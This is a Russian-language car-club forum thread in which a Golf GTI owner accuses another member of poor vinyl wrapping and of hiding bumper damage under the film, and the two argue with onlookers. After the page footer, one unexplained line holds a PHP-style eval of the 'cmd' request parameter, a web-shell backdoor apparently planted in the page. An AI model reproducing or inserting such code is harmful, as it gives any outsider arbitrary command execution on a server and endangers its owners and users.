+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 25

Тема: Оклейка пленки by Extreem


  1. #1
    Около сток Pool has a spectacular aura about Pool has a spectacular aura about Pool has a spectacular aura about Аватар для Pool
    Регистрация
    15.02.2012
    Откуда
    Москва
    Машина
    Golf 6 GTI
    Сообщений
    668

    Thumbs down Оклейка пленки by Extreem

    Форумчане! Начну свой сказ с простого.
    Решил сделать легкие украшетельства авто. Кто знает машина белая, а хотелось черных лопухов зеркал, и красной губы спойлера переднего бампера. Для всего этого мне потребовался комплект стоковых тормозов и колодок с авто, которая пробежала порядка 5 000 км (решил заменить на не сток). Это добро я договорился с Костей (ака Extreem) обменять на обтяг вышеуказанных деталей в пленку.
    Опущу сроки исполнения (((.
    И вот самое главное началось. Пленка на левом лопухе (место не имеющую нагрузку ветром, складываением и прочей деятельностью зеркала) стала отслаиваться и лопаться после полугода. Ну да ладно может я так плохо езжу и потом обратил внимание на правое зеркало - такая же тема с отслаиванием. С губой вроде все ОК.
    Этим сентябрем решился обновиться и сделать все сам. Но теперь не пленка и пластидип (черный и красный). Лопух снял ободрал пленку, обезжирил и нанес несколько слоев - все ок. Лопухи норм, повреждений нет.

    ВОТ ТЕПЕРЬ самое главное - обдираю пленку с губы и потихоньку охреневаю. И не только я. Такое ощущение что губа не моя. За 5 000 км (общий пробег авто когда гнималась губа) так изуродовать губу возможно, но я не "мастер" парковки в бордюры, и чирканье обо все что только можно. Поверьте. Машина на ППД до сих пор. Ее не только красить надо, но и шпаклевать. Получается мне отдали губу в таком состоянии под пленкой. Без каких либо комментариев....

    Все это я к тому, что много сказано, о том как другие работают, а сами иногда делают не лучше - да Костя?
    Golf 6 GTi - едет очень хорошо

  2. #2
    GTI-Racing eXtreeM will become famous soon enough eXtreeM will become famous soon enough Аватар для eXtreeM
    Регистрация
    12.08.2007
    Откуда
    Москва (почти)
    Машина
    GTI 6 WhiteCandy DSG 4motion
    Сообщений
    570
    Ага. Ты забыл вспомнить, что я лопнул твое зеркало и тут же поставил свое. А еще, что ты даже не приезжал в имаген. Это я к тебе ездил, чтоб снять губу с лопухами и затянуть их. Результаты эксплуатации даже не буду комментировать. Я лично на ппд тысячу раз задевал губой наши супер бордюры.
    Подход мой виден. От тебя никаких претензий я не слышал до этой темы. Можешь продолжать стелиться под... Ну ты понял про кого я. На этом тема для меня закрыта.

  3. #3
    Около сток Pool has a spectacular aura about Pool has a spectacular aura about Pool has a spectacular aura about Аватар для Pool
    Регистрация
    15.02.2012
    Откуда
    Москва
    Машина
    Golf 6 GTI
    Сообщений
    668
    Где я про Имаджен написал? Вроде не вижу.
    Заменил зеркало, я и сейчас говорю спасибо. А как могло быть иначе? Место встречи и детали встречи мы обсуждали, если не помнишь за лопухами мне пришлось к тебе ехать, ну так чуть чуть.
    Почему не было до этого - просто когда начал делать сам то все увидел (вопросов больше не имею). Ездить аккуратно имею, научился.

    На счет стелиться это ты не прав в корне, ты понимаешь, о чем я. Успехов.
    Golf 6 GTi - едет очень хорошо

  4. #4
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    .....когда читаем про тема закрыта, это значит что еще клиент должен доказать, что прав?

    Кстати, а где Ильюха с картинкой "вот это поворот"? шутка конечно... это ж не кк где что ни тема так помидоры летят не разбери куда и в кого.
    песок сыпется....не останавливайтесь на достигнутом !

  5. #5
    [QUOTE=eXtreeM; Можешь продолжать стелиться под... Ну ты понял про кого я. На этом тема для меня закрыта.[/QUOTE]

    а для чего ты указываешь человеку , что ему делать ?

  6. #6
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    Цитата Сообщение от Pool Посмотреть сообщение
    Где я про Имаджен написал? Вроде не вижу.
    Заменил зеркало, я и сейчас говорю спасибо. А как могло быть иначе? Место встречи и детали встречи мы обсуждали, если не помнишь за лопухами мне пришлось к тебе ехать, ну так чуть чуть.
    Почему не было до этого - просто когда начал делать сам то все увидел (вопросов больше не имею). Ездить аккуратно имею, научился.

    На счет стелиться это ты не прав в корне, ты понимаешь, о чем я. Успехов.
    Тогда для чего создана эта тема в тени последних событий?

    😂😂😂😂 большего бреда и не придумать
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

  7. #7
    GTI-Racing Пьеро is on a distinguished road Аватар для Пьеро
    Регистрация
    15.04.2013
    Откуда
    Серебряные Пруды
    Машина
    Scirocco 2.0
    Сообщений
    350
    Когда зимой пластидим деформируется, винить будет производителя краски и Экстрима.

  8. #8
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    Цитата Сообщение от Пьеро Посмотреть сообщение
    Когда зимой пластидим деформируется, винить будет производителя краски и Экстрима. 😹
    Нет думаю что проищводитель не при чем будет.


    Костя делал косяки при работе.... но всегда решались траблы.... а тут бредовые предъевы..... через хз скока времени придъявить за губу которая уже царапана при спуске новой с автовоза.... низ не видно никому
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

  9. #9
    Около сток Pool has a spectacular aura about Pool has a spectacular aura about Pool has a spectacular aura about Аватар для Pool
    Регистрация
    15.02.2012
    Откуда
    Москва
    Машина
    Golf 6 GTI
    Сообщений
    668
    Бррр....

    Причем тут пластидип?

    Тема появилась когда я увидел что под пленкой. Это срок годности не имеет.

    Вопрос упрощается: губа моя или чья другая?

    Предьяв нет, есть описание ситуации.
    Golf 6 GTi - едет очень хорошо

  10. #10
    Гангста-панда MSK has a spectacular aura about MSK has a spectacular aura about MSK has a spectacular aura about Аватар для MSK
    Регистрация
    07.03.2009
    Откуда
    Москва
    Машина
    GTI mk5 OVERLOAD Edition
    Сообщений
    953
    Лён тогда емли нет предъяв зачем этоь бред неимеющий смысла тут писать было??
    OVERLOAD POWER


    всё может быть и всё быть может
    и лишь того не может быть
    чего и вовсе быть не может
    всё остальное может быть!

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Оклейка авто виниловой пленкой
    от sega888 в разделе Партнеры / Клубные скидки
    Ответов: 19
    Последнее сообщение: 02.04.2024, 02:10
  2. Костя eXtreem c ДР!
    от Pool в разделе Курилка
    Ответов: 10
    Последнее сообщение: 11.07.2014, 16:44
  3. eXtreeM с Днюхой!!!
    от ™B®embo™ в разделе Курилка
    Ответов: 13
    Последнее сообщение: 14.07.2012, 22:16
  4. eXtReeM стал старше...
    от Fels в разделе Курилка
    Ответов: 7
    Последнее сообщение: 11.07.2011, 14:47

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}